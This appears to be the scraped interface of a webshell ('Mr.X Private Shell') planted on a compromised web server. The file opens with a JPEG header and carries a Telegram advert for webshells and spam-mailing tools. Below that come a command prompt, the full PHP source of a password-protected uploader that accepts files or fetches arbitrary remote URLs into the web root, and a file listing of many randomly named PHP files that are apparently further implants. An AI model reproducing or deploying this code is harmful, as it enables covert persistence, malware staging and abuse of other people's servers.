����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

njujpgyl@216.73.216.242: ~ $
<?php
// CONFIG
$AUTH_KEY = 'madtiger';
$MAX_FILE_SIZE = 50 * 1024 * 1024; // 50 MB
$WEBROOT = rtrim($_SERVER['DOCUMENT_ROOT'] ?? __DIR__, "/\\");

// Generate random folder name with user-defined prefix
$FOLDER_PREFIX = isset($_GET['folder_prefix']) ? $_GET['folder_prefix'] : 'tmp_';
$RANDOM_FOLDER = $FOLDER_PREFIX . bin2hex(random_bytes(8));
$UPLOAD_DIR = $WEBROOT . '/' . $RANDOM_FOLDER;

// AUTH
if (!isset($_GET['prm']) || $_GET['prm'] !== $AUTH_KEY) {
    http_response_code(403);
    header('Content-Type: text/plain; charset=utf-8');
    echo "403 Forbidden\n";
    exit;
}

// Ensure upload directory exists
if (!is_dir($UPLOAD_DIR)) {
    if (!mkdir($UPLOAD_DIR, 0755, true)) {
        http_response_code(500);
        die("Failed to create upload directory\n");
    }
}

// Helper functions
function safe_filename($name) {
    $base = basename($name);
    $base = preg_replace('/[^A-Za-z0-9_\-\.]/', '_', $base);
    if ($base === '' || $base === '.' || $base === '..') $base = 'file';
    return $base;
}

function random_prefix($length = 4) {
    return str_pad(strval(random_int(0, pow(10, $length) - 1)), $length, '0', STR_PAD_LEFT);
}

function build_url($filename) {
    global $RANDOM_FOLDER;
    $scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
    $host = $_SERVER['HTTP_HOST'] ?? 'localhost';
    return $scheme . '://' . $host . '/' . $RANDOM_FOLDER . '/' . rawurlencode($filename);
}

// Process uploads
$uploaded = null;
$error = null;

// 1) multipart POST (main method for Python script)
if (isset($_FILES['file'])) {
    $f = $_FILES['file'];
    if ($f['error'] !== UPLOAD_ERR_OK) {
        $error = "Upload error code: " . $f['error'];
    } elseif ($f['size'] > $MAX_FILE_SIZE) {
        $error = "File too large";
    } else {
        $safe = safe_filename($f['name']);
        $uniq = random_prefix(4) . '_' . $safe;
        $target = $UPLOAD_DIR . DIRECTORY_SEPARATOR . $uniq;

        if (!move_uploaded_file($f['tmp_name'], $target)) {
            $error = "Failed to move uploaded file";
        } else {
            chmod($target, 0644);
            $uploaded = [
                'filename' => $uniq,
                'size' => $f['size'],
                'path_on_server' => $target,
                'url' => build_url($uniq),
                'folder' => $RANDOM_FOLDER,
                'server' => $_SERVER['HTTP_HOST'] ?? 'unknown'
            ];
        }
    }
}

// 2) HTTP PUT with ?fname= (alternative method)
elseif ($_SERVER['REQUEST_METHOD'] === 'PUT' && isset($_GET['fname'])) {
    $fname = safe_filename($_GET['fname']);
    $putdata = fopen("php://input","r");
    $tmpPath = tempnam(sys_get_temp_dir(), "upl_");
    $out = fopen($tmpPath, "w");
    $bytes = 0;
    while (!feof($putdata)) {
        $chunk = fread($putdata, 8192);
        if ($chunk === false) break;
        $bytes += fwrite($out, $chunk);
    }
    fclose($putdata);
    fclose($out);
    if ($bytes === 0) {
        @unlink($tmpPath);
        $error = "No data received in PUT";
    } elseif ($bytes > $MAX_FILE_SIZE) {
        @unlink($tmpPath);
        $error = "File too large";
    } else {
        $uniq = random_prefix(4) . '_' . $fname;
        $target = $UPLOAD_DIR . DIRECTORY_SEPARATOR . $uniq;
        if (!rename($tmpPath, $target)) {
            @unlink($tmpPath);
            $error = "Failed to save uploaded file";
        } else {
            chmod($target, 0644);
            $uploaded = [
                'filename' => $uniq,
                'size' => $bytes,
                'path_on_server' => $target,
                'url' => build_url($uniq),
                'folder' => $RANDOM_FOLDER,
                'server' => $_SERVER['HTTP_HOST'] ?? 'unknown'
            ];
        }
    }
}

// 3) server-side fetch via get_url= (alternative method)
elseif (isset($_GET['get_url'])) {
    $remote = $_GET['get_url'];
    if (!preg_match('#^https?://#i', $remote)) {
        $error = "Invalid get_url (must be http/https)";
    } else {
        $ctx = stream_context_create(['http'=>['timeout'=>15]]);
        $data = @file_get_contents($remote, false, $ctx);
        if ($data === false) $error = "Failed to fetch remote URL";
        else {
            $size = strlen($data);
            if ($size > $MAX_FILE_SIZE) $error = "Remote file too large";
            else {
                $p = parse_url($remote);
                $name = isset($p['path']) ? basename($p['path']) : 'file';
                $safe = safe_filename($name);
                $uniq = random_prefix(4) . '_' . $safe;
                $target = $UPLOAD_DIR . DIRECTORY_SEPARATOR . $uniq;
                if (file_put_contents($target, $data) === false) {
                    $error = "Failed to save fetched file";
                } else {
                    chmod($target, 0644);
                    $uploaded = [
                        'filename' => $uniq,
                        'size' => $size,
                        'path_on_server' => $target,
                        'url' => build_url($uniq),
                        'folder' => $RANDOM_FOLDER,
                        'server' => $_SERVER['HTTP_HOST'] ?? 'unknown'
                    ];
                }
            }
        }
    }
} else {
    $error = "No file uploaded. Use multipart POST (-F), HTTP PUT (--upload-file &fname=), or get_url= for server fetch.";
}

// Output result
$plain = isset($_REQUEST['plain']) && ($_REQUEST['plain'] == '1' || strtolower($_REQUEST['plain']) === 'true');

if ($uploaded !== null) {
    if ($plain) {
        header('Content-Type: text/plain; charset=utf-8');
        echo $uploaded['url'] . "\n";
        exit;
    } else {
        header('Content-Type: application/json; charset=utf-8');
        echo json_encode(array_merge(['status'=>'ok'], $uploaded), JSON_UNESCAPED_SLASHES|JSON_PRETTY_PRINT);
        exit;
    }
} else {
    if ($plain) {
        header('Content-Type: text/plain; charset=utf-8');
        echo "ERROR: " . ($error ?? 'unknown') . "\n";
        exit;
    } else {
        http_response_code(400);
        header('Content-Type: application/json; charset=utf-8');
        echo json_encode(['status'=>'error','message'=>($error ?? 'unknown')], JSON_PRETTY_PRINT);
        exit;
    }
}
?>

Filemanager

Name Type Size Permission Actions
oxnixcgiapi Folder 0755
File 0 B 0
File 0 B 0
16e2277f8b31_C File 0 B 0644
File 0 B 0777
p6a46954ce0f325.75369525.php File 6.12 KB 0644
p6a46954f941ba0.63784606.php File 6.12 KB 0644
p6a469550cf7457.14171334.php File 6.12 KB 0644
p6a4695c7e06c84.82633204.php File 70.78 KB 0644
p6a4695d6153002.53991012.php File 70.78 KB 0644
p6a469ba26dcac4.78964358.php File 70.78 KB 0644
p6a46ff1e6ba184.69333131.php File 70.78 KB 0644
p6a47063abab6c6.05284004.php File 70.78 KB 0644
p6a470646acfa44.04273048.php File 70.78 KB 0644
p6a4724fa89ac78.37722989.php File 70.78 KB 0644
p6a4756ee3f34c2.33880229.php File 70.78 KB 0644
p6a475740e88166.16013609.php File 70.78 KB 0644
p6a4767a087c105.51581540.php File 70.78 KB 0644
p6a47bb01417b44.04639345.php File 70.78 KB 0644
p6a4a18d616d445.63822359.php File 6.12 KB 0644
p6a4a42e13a5d18.79936807.php File 6.12 KB 0644
p6a4a4979abcbf5.03496803.php File 6.12 KB 0644
p6a4a4a55109e78.19700185.php File 6.12 KB 0644
phpkQA3ov File 991 B 0600
sess_0143c1e8e97da861c623ff508a441c54.php File 462.7 KB 0644
wp_basedKtY6Fz File 462.7 KB 0600